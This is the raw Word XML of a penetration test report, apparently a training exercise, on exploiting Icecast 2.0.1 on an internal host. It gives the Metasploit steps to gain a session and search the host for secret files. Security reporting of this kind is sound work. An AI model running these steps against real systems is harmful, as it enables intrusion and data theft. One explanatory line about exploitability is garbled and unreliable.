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6B3E4" w14:textId="5A8176C4" w:rsidR="00F405DA" w:rsidRDefault="00925E3B" w:rsidP="00A734A3">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B618D7" w14:textId="2A2277DC" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GoodSecurity Penetration Test Report </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46546001" w14:textId="2DF3DA49" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="5205D07F" w14:textId="7DBD00E2" w:rsidR="00A734A3" w:rsidRPr="00BC4C7A" w:rsidRDefault="00610ACF" w:rsidP="00BC4C7A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="005D7D5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
          </w:rPr>
          <w:t>paulbarrett@GoodSecurity.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41AD3B53" w14:textId="77777777" w:rsidR="00BC4C7A" w:rsidRPr="00BC4C7A" w:rsidRDefault="00BC4C7A" w:rsidP="00BC4C7A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F12E20" w14:textId="6CFBA048" w:rsidR="00A734A3" w:rsidRPr="00BC4C7A" w:rsidRDefault="00610ACF" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>04/11/2020</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2EEBB54E" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00745A2D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GoodSecurity was tasked with performing an internal penetration test on GoodCorp’s CEO, Hans </w:t>
      </w:r>
      <w:r w:rsidR="00CF3B9C">
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>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69A19DA8" w14:textId="77777777" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00745A2D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>When performing the internal penetration test, there were several alarming vulnerabilities that were</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A956C" w14:textId="0639D3E1" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00745A2D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:contextualSpacing/>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Pr="009B68CD" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B68CD">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Machine IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC8BDB" w14:textId="668158F4" w:rsidR="00484430" w:rsidRPr="000A0FA3" w:rsidRDefault="00610ACF" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A0FA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4760934F" w14:textId="29C55D75" w:rsidR="00484430" w:rsidRPr="009B68CD" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B68CD">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Hostname:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00947C11" w14:textId="77777777" w:rsidR="000A0FA3" w:rsidRDefault="000A0FA3" w:rsidP="000A0FA3">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As per evidence screenshot </w:t>
      </w:r>
      <w:r w:rsidRPr="000A0FA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>penetration-1701.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the Host name is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E60E19" w14:textId="2F96E9E7" w:rsidR="000A0FA3" w:rsidRDefault="000A0FA3" w:rsidP="000A0FA3">
      <w:r w:rsidRPr="000A0FA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSEDGEWIN10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B80E0AE" w14:textId="603C0704" w:rsidR="00484430" w:rsidRPr="009B68CD" w:rsidRDefault="00484430" w:rsidP="000A0FA3">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B68CD">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61233FEE" w14:textId="26F64DF0" w:rsidR="00F77419" w:rsidRPr="00F77419" w:rsidRDefault="00F77419" w:rsidP="00A734A3">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As per evidence screenshot </w:t>
      </w:r>
      <w:r w:rsidRPr="000A0FA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>penetration-170</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="000A0FA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>Exploit Title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A42FAB" w14:textId="06D307EA" w:rsidR="00484430" w:rsidRPr="000A0FA3" w:rsidRDefault="00610ACF" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A0FA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Icecast</w:t>
      </w:r>
      <w:r w:rsidR="00F77419">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.0.1 (Windows x86) – Header Overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD1EC4" w14:textId="39D26657" w:rsidR="00484430" w:rsidRPr="009B68CD" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B68CD">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerability Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E78631" w14:textId="2C20486A" w:rsidR="00B203F3" w:rsidRDefault="009B68CD" w:rsidP="00A734A3">
      <w:r>
        <w:t>By definition,</w:t>
      </w:r>
      <w:r w:rsidR="00B203F3">
        <w:t xml:space="preserve"> an attack is possible when the Icecast Server has not been patched to latest versions, which leaves Icecast Server versions up to 2.0.1 susceptible to buffer overflow vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ACDF50" w14:textId="7403017F" w:rsidR="00484430" w:rsidRDefault="009B68CD" w:rsidP="00A734A3">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00B203F3">
        <w:t>vulnerability allows for code to be executed remotely when the Icecast server is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D62DE" w14:textId="49E58A44" w:rsidR="00335754" w:rsidRDefault="00335754" w:rsidP="00A734A3">
      <w:r w:rsidRPr="00335754">
        <w:t>Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C321D95" w14:textId="0BD9DBAC" w:rsidR="009B68CD" w:rsidRDefault="009B68CD" w:rsidP="00A734A3">
      <w:r>
        <w:t xml:space="preserve">The vulnerability is only </w:t>
      </w:r>
      <w:r w:rsidR="00B203F3">
        <w:t>exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when code is remotely executed on Microsoft Operating Systems, however the buffer overflow affects all platforms, </w:t>
      </w:r>
      <w:r w:rsidR="00B203F3">
        <w:t>and is only exploitable when a sensitive IP address is located adjacent to the affected buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD7CC5" w14:textId="71A00629" w:rsidR="00484430" w:rsidRPr="009B68CD" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B68CD">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36006C82" w14:textId="5A840214" w:rsidR="00B203F3" w:rsidRDefault="00B203F3" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">According to </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="005D7D5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cvedetails.com/vulnerability-list/vendor_id-693/Icecast.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00335754">
        <w:t xml:space="preserve">the version 2.0.1 of Icecast Server has a </w:t>
      </w:r>
      <w:r w:rsidR="00335754" w:rsidRPr="00335754">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Vulnerability score of 7.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1550A624" w14:textId="39B1DE82" w:rsidR="00335754" w:rsidRDefault="00335754" w:rsidP="00A734A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BA34D3E" wp14:editId="6288EB25">
            <wp:extent cx="5937250" cy="527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527050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2319502D" w14:textId="3FCCFC86" w:rsidR="00484430" w:rsidRDefault="00586D5E" w:rsidP="00A734A3">
      <w:r>
        <w:t xml:space="preserve">Based on my expert opinion, the vulnerability risk </w:t>
      </w:r>
      <w:r w:rsidR="009B68CD">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="009B68CD" w:rsidRPr="009B68CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
      <w:r w:rsidR="009B68CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009B68CD" w:rsidRPr="009B68CD">
        <w:t>The likelihood of a data breach is</w:t>
      </w:r>
      <w:r w:rsidR="009B68CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Very Likely, </w:t>
      </w:r>
      <w:r w:rsidR="009B68CD" w:rsidRPr="009B68CD">
        <w:t>and the impact to the business will be</w:t>
      </w:r>
      <w:r w:rsidR="009B68CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Significant. </w:t>
      </w:r>
      <w:r w:rsidR="009B68CD" w:rsidRPr="009B68CD">
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="009B68CD">
        <w:t>my opinion</w:t>
      </w:r>
      <w:r w:rsidR="009B68CD" w:rsidRPr="009B68CD">
        <w:t>, it is not</w:t>
      </w:r>
      <w:r w:rsidR="009B68CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> if the vulnerability will be exploited, but when.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CB6825" w14:textId="52623C92" w:rsidR="00586D5E" w:rsidRDefault="00586D5E" w:rsidP="00A734A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DBA97E4" wp14:editId="1A61BA0E">
            <wp:extent cx="4572000" cy="2355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355850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8A68A" w14:textId="52CEF2E1" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B68CD">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68488EAF" w14:textId="443F9BEE" w:rsidR="00745A2D" w:rsidRPr="00745A2D" w:rsidRDefault="00745A2D" w:rsidP="00A734A3">
      <w:r w:rsidRPr="00745A2D">
        <w:t xml:space="preserve">Terminal commands have been </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3B9C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-AU"/>
        </w:rPr>
        <w:t>highlighted</w:t>
      </w:r>
      <w:r w:rsidR="00925E3B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-AU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22998659" w14:textId="77777777" w:rsidR="00FF757D" w:rsidRDefault="00FF757D" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-AU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC80B9F" w14:textId="087C4617" w:rsidR="00484430" w:rsidRPr="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60ACD">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-AU"/>
        </w:rPr>
        <w:t>Searchsploit icecast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AC397B" w14:textId="16F307BD" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A734A3">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46F489EB" wp14:editId="2E5BE87E">
            <wp:extent cx="477202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2000250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C8899" w14:textId="7DC5828F" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A734A3">
      <w:r>
        <w:t>then using Metasploit,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8BD93B" w14:textId="77777777" w:rsidR="00A60ACD" w:rsidRPr="00B27B40" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B27B40">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>search icecast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2E9160" w14:textId="62D3BAC3" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A734A3">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38320EDB" wp14:editId="7370AFA3">
            <wp:extent cx="4679950" cy="3079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9950" cy="3079750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB0C93E" w14:textId="1DB7028D" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A734A3">
      <w:r w:rsidRPr="002A226E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B66A11" w14:textId="7A335039" w:rsidR="00484430" w:rsidRDefault="00A60ACD" w:rsidP="00A734A3">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D999B49" wp14:editId="28E70DAC">
            <wp:extent cx="4676775" cy="3095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3095625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDAB189" w14:textId="77777777" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F03FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDEB3A0" w14:textId="3B864D5B" w:rsidR="00484430" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="171E58A5" wp14:editId="023B645F">
            <wp:extent cx="5467350" cy="471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4718050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F66C0CE" w14:textId="77777777" w:rsidR="00A60ACD" w:rsidRPr="005D4E98" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D4E98">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A52626C" w14:textId="1154E185" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A2B4E57" wp14:editId="5A69364C">
            <wp:extent cx="4730750" cy="221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750" cy="2216150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="569CD8D2" w14:textId="77777777" w:rsidR="00A60ACD" w:rsidRPr="001243A7" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001243A7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C71FA" w14:textId="729A033E" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42C6C428" wp14:editId="5E600134">
            <wp:extent cx="4749800" cy="2203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800" cy="2203450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="797094C5" w14:textId="77777777" w:rsidR="00A60ACD" w:rsidRPr="003C3419" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3419">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>search -f *secretfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197B4747" w14:textId="693FEBB0" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF9BF03" wp14:editId="6B21A450">
            <wp:extent cx="4737100" cy="2159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2159000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E836546" w14:textId="77777777" w:rsidR="00A60ACD" w:rsidRPr="003C3419" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3419">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>search -f *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>recipe</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3419">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441B5D9" w14:textId="25B92711" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B1C7BE2" wp14:editId="1EC97C99">
            <wp:extent cx="4775200" cy="21844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200" cy="2184400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
